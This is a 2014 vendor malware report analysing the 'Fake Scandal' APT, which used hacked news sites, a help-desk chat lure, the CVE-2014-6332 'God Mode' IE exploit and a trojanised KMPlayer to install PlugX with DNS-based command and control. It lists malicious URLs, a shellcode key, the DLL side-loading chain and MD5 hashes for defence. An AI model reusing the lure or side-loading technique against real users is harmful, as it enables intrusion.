Fake Scandal

1 Malware Report | November 2014

Fake ScandalGOD MODE SPREADS THE NEW PLUGX BACKDOOR

Fake Scandal

Fake Scandal

Actionable Intelligence to Prevent Future Attacks

Background: Using God Mode to Enable Remote Code Execution

Innovative Attack Vectors

Technical Analysis

Exploit CVE-2014-6332 to Install Plugx Malware

Repacked KM Player with Embedded Plugx Malware

Malware Analysis—Abusing DNS Protocol as a Covert Channel

Actionable Intelligence

Related MD5 Hashes

Intelligent Solutions Are Required to Combat Today’s Hyper-Sophisticated APTs

References

Verint. Powering Actionable Intelligence®

TABLE OF CONTENTS

Unauthorized use, duplication, or modification of this document in whole or in part without the written consent of Verint Systems Inc. is strictly prohibited.By providing this document, Verint Systems Inc. is not making any representations regarding the correctness or completeness of its contents and reserves the right to alter this document at any time without notice.Features listed in this document are subject to change. Please contact Verint for current product features and specifications.All marks referenced herein with the ® or TM symbol are registered trademarks or trademarks of Verint Systems Inc. or its subsidiaries. All rights reserved. All other marks are trademarks of their respective owners.© 2014 Verint Systems Inc. All rights reserved worldwide.

1

1

2

2

4

4

5

7

9

9

9

9

10

Fake Scandal

1

FAKE SCANDAL

The Verint research team discovered a dangerous APT—nicknamed Fake Scandal—that combined several innovative techniques, some of which have yet to be detected in the wild.

The savvy attackers compromised two news sites (one in Hong Kong and one in Taiwan) and manufactured scandalous news items to host exploit malware. In addition to common spear-phishing emails, this time the attackers lured company employees to open a malicious web link by interacting with the company online help desk.

The crafted webpage contains the CVE 2014-6332 (or Microsoft MS14-064) exploit code that manipulates memory space and then disables SafeMode—enabling God Mode. In God Mode an attacker can run remote code execution without the need for shellcode. Interestingly, even if the lured targets had their Windows patched, the attackers would further instruct them into downloading the KMPlayer video software, which was repacked with embedded Plugx malware. In the end, the planted malware utilizes stealthy DNS protocol as a covert channel for C2 communications.

Actionable Intelligence to Prevent Future AttacksVerint provides the Actionable Intelligence in the form of MD5 hashes that enable organizations to identify and prevent advanced APTs from exploiting this vulnerability in order to gain control of user machines.

This sophisticated, multi-stage APT has yet to be discovered by other security vendors. Verint‘s breakthrough detection is the first report of an APT where attackers tried to directly interact with employees online, as well as the first known instance of Plugx RAT malware using the DNS query protocol for C2 communications.

Fake Scandal

2

BACKGROUND: USING GOD MODE TO ENABLE REMOTE CODE EXECUTION

INNOVATIVE ATTACK VECTORS

CVE-2014-6332 was among the 16 security updates included in Microsoft’s latest Patch Tuesday release (Microsoft’s regular patch released on the second Tuesday of each month) on Nov. 11, 2014. This vulnerability, also known as the Windows OLE Automation Array Remote Code Execution Vulnerability, captured the attention of the cyber security community for good reason. This vulnerability can be used to exploit any Internet Explorer browser—from version 3 (back to 1996) to version 11 (2013) - allowing remote attackers to execute arbitrary code via a crafted website. The bug is caused by improper handling of a size value in the OLE SafeArray resizing function, which allows anyone to perform arbitrary read/write functions in the memory address space of the process.

Although this vulnerability alone is not enough to exploit an application and gain code execution, attackers can use it to disable the SafeMode. This technique, often referred to as God Mode, was discovered by Chinese researchers Yang Yu (tombkeeper)1 and Yuange2. Once in God Mode, an attacker can bypass zone checking in Internet Explorer and enable remote code execution on the machine. By combining these two “tricks” (turning off SafeMode and bypassing zone checking), an attacker can run any program without shellcode. This is an innovative way to bypass commonly used mitigation mechanisms, such as EMET, ALSR, DEP, etc.

Targeted attacks typically use email or links as the vector for injecting malware onto a victim’s machine. These simple social engineering techniques enable attackers to interact with their victims by enticing them to open spoofed emails (i.e., phishing) or click on malicious web links.

However, this operation reveals a much more sophisticated and resourceful method than typical social engineering techniques. First, the attackers invaded an official news website, and crafted scandal-related news items related to various companies. Next, they would embed malicious code (CVE-2014-6332) into these fake news pages and lure a targeted company employee to view the webpage. With static file analysis, Verint discovered malicious code inside the web traffic payload.

Then, to maximize clicks on the link to the fake news site and to avoid anti-APT emails devices, the attackers not only distribute it through email, but also via online help desk services. The following is a real conversation log extracted from such a help desk service.

Conversation log from help desk[GUEST] 2014-11-13 15:50:11 say:Hello[Services Helper Num.501] 2014-11-13 15:50:50 say:

1 http://threatpost.com/microsoft-pays-out-another-100000-mitigation-bypass-bounty/1042912 http://hi.baidu.com/yuange1975/item/863a25e4501f542c5a7cfb7b

Fake Scandal

3

Hello[GUEST] 2014-1113 15:51:19 say:I’m Hong Kong HNN news editor.[Services Helper Num.501] 2014-11-13 15:51:32 say:Yes, May I help you?[GUEST] 2014-11-13 15:51:32 say:Would you please tell me your chief’s mail address?[GUEST] 2014-11-13 15:51:36 say:http://news.hnn.hk/2014/0729/private_newstw.phpWe have received the news about your employee’s bribery scandal but right now I cannot contact your chief to confirm this. Please visit this link as soon as possible.

Verint’s discovery is the first reporting of an APT where attackers not only sent the malicious link via email, but also were identified trying to actively interact with employees online to convince them to click on the link.

Fake scandal news page (HNN news site is hacked and used to announce fake news)

Fake Scandal

4

The help desk dialog links to what looks like a normal news page with the Chinese title “[breaking news] The Hong Kong tourists are extorted by customs staff while immigrating into Taiwan.” This page also indicates that users should download KMPlayer if the video cannot be displayed correctly.

After analyzing the above page, we found that hackers used two methods of attack. First, the page contains CVE 2014-6332 exploit code, which was modified from Yuange1975’s proof of concept (PoC) code. The exploit uses the OLE resizing vulnerability to disable Internet Explorer’s (IE) SafeMode flag in memory and escapes from zone checking when creating any object. Second, they also trick users into downloading the Portable KMPlayer to play the video. If users click on the download link, the repacked KMPlayer program will be downloaded from the HNN news site.

Exploit CVE-2014-6332 to Install Plugx MalwareThe first stage of the attack is to silently install the Plugx malware:

• When users browse the page in Internet Explorer, it triggers the vulnerability and executes a different web page (www.twnewsdaily.com/home/old_no/pay.html) via mshta.exe.

• Pay.html is responsible for downloading and executing “apple.jpg” file (in reality this is a Plugx malware file)

TECHNICAL ANALYSIS

Twnewsdaily.com also used for injecting malware (apple.jpg) in victims’ computers

Fake Scandal

5

When browsing the page, the vulnerability is triggered to install a Plugx RAT

Repacked KMPlayer with Embedded Plugx MalwareIn the second stage of the attack, the attackers trick users into downloading the modified and malicious KMPlayer software:

• If users follow the download instructions, they will download a portable KMPlayer.zip file from the HNN news site.

• After analyzing the KMPlayer.zip file, we found that it is different from the official site.

Fake Scandal

6

Earth.ksf,Moon.ksf and apphelp.dll were added to the KMPlayer.zip

Plugx RAT Installation Flow

• The attackers put “apphelp.dll” in the root directory. As a result, when executing KMPlayer.exe (a signed file), “apphelp.dll” will be loaded first. This technology called “DLL-Path hijacking” (aka DLL Side-loading) is a common way to load Plugx malware.

• The fake apphelp.dll file is responsible for the following jobs:

1. Load Skins\Moon.ksf (an encrypted shellcode), decrypt it, and create a thread to run the decrypted shellcode with key “aRYcQ0dM”.

2. ”Skins\Earth.ksf” (real Plugx malware) will be moved to %TEMP%\KMPsetup.exe and executed. Earth.ksf (a PlugX DLL-Path hijacking package) contains three files:

> FSPMAPI.dll is a loader which will decrypt FSPMAPI.dll.fsp and run the shellcode. In addition, the dll will check whether the system date is later than 2014.6.6.

> FSPMAPI.dll.fsp is the main body of the encrypted Plugx.

> Fsstm.exe is an official program from F-Secure Anti-Virus company, however being used as a helper to perform DLL-Path hijacking.

3. Delete Skins\Moon.ksf; Move apphelp.dll to %TEMP%\~hotfix12887.tmp

Fake Scandal

7

Malware Analysis—Abusing DNS Protocol as a Covert ChannelIn this attack, the communication methods used by Plugx RAT are changed significantly to mask the communications. This finding marks the first reporting of the Plugx RAT malware using the DNS query protocol for C2 communications.

Communication with C2 through DNS protocol

Fake Scandal

8

Verint TPS applies Dynamic Analysis to identify the malware executable file

Our automated behavioral scan of the new Plugx RAT is shown below:

Fake Scandal

9

ACTIONABLE INTELLIGENCEVerint recommends that organizations take the following countermeasures to protect users against the CVE-2014-6332 vulnerability:

• Verint recommends all servers should apply the patch (MS14-064) as soon as possible.

• Block the C2 and monitor DNS query traffic.

• Open the Protected Mode in your browser.

Related MD5 HashesF8F051B688E9EA194650E8B7482B4773 apple.jpg

67A46FEF41D7DB7974DB64AE15A6532F KMplayer.zip

0D0A7540494F1319CA3CE8E58EE2B254 ~hotfix12887.tmp

0D0A7540494F1319CA3CE8E58EE2B254 apphelp.dll

F8F051B688E9EA194650E8B7482B4773 Earth.ksf

B912BBDFA58FB1AAB886F4F0B191625E FSPMAPI.dll

9EF895B5892F6F1F917291812C110B31 FSPMAPI.dll.fsp

3A9CD20F84BE1C919A6C8FB263E00A95 fsstm.exe

Intelligent Solutions Are Required to Combat Today’s Hyper-Sophisticated APTsThis is a real-world case of an APT attack discovered by Verint. The attacker compromised two news sites (one in Hong Kong and one in Taiwan) and created a fake scandal story as the bait to entice company employees to click on the malicious links. Beyond spoofed emails, these savvy attackers also interacted with their victims through an online help desk. It is clear that attackers will make every effort to take advantage of this vulnerability in order to penetrate a company’s security perimeter using a variety of creative and innovative methods.

Referenceshttps://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332

https://technet.microsoft.com/library/security/ms14-064

http://deepflash.blogspot.com/2014/11/ie-safemode-bypass.html

12

About Verint Systems Inc.Verint® (Nasdaq: VRNT) is a global leader in Actionable Intelligence® solutions with a focus on customer engagement optimization, security intelligence, and fraud, risk and compliance. Today, more than 10,000 organizations in 180 countries — including over 80 percent of the Fortune 100 — count on intelligence from Verint solutions to make more informed, effective and timely decisions.

w w w . v e r i n t . c o m / c y b e r | I n f o . c y b e r @ v e r i n t . c o m